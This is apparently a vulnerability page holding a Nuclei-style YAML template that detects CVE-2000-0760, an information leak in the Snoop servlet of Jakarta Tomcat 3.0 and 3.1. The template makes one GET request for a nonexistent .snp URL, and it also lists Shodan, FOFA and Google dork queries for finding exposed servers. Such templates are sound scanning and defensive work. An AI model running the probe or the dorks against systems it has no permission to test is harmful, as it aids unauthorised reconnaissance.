漏洞描述
Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access.
CVE-2000-0760: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure
PoC代码[已公开]
id: CVE-2000-0760
info:
name: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure
author: Thabisocn,0x_Akoko
severity: medium
description: |
Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access.
impact: |
Attackers can retrieve sensitive system information, potentially aiding further attacks or information disclosure.
remediation: |
Update to the latest version of Jakarta Tomcat or apply security patches that fix the Snoop servlet issue.
reference:
- https://www.exploit-db.com/exploits/20132
- https://nvd.nist.gov/vuln/detail/CVE-2000-0760
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2000-0760
epss-score: 0.33581
epss-percentile: 0.96736
cpe: cpe:2.3:a:apache:tomcat:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: tomcat
shodan-query:
- cpe:"cpe:2.3:a:apache:tomcat"
- http.component:"apache tomcat"
- product:"tomcat"
fofa-query:
- body="apache tomcat"
- body="jk status manager"
google-query:
- site:*/examples/jsp/snp/snoop.jsp
- intitle:"apache tomcat"
tags: cve,cve2000,jakarta,tomcat,exposure
http:
- method: GET
path:
- "{{BaseURL}}/examples/jsp/snp/anything.snp"
matchers-condition: and
matchers:
- type: word
words:
- "Request Information"
- "Path info"
- "Server name"
- "Remote address"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100b9aeb0509a59df08e57ed34358daacec550b198785ebe5223b447ab887fa777302205670ae173e74e05c0da531098f6122c807d7d9c4925e27645cb678ccef7263bd:922c64590222798bb761d5b6d8e72950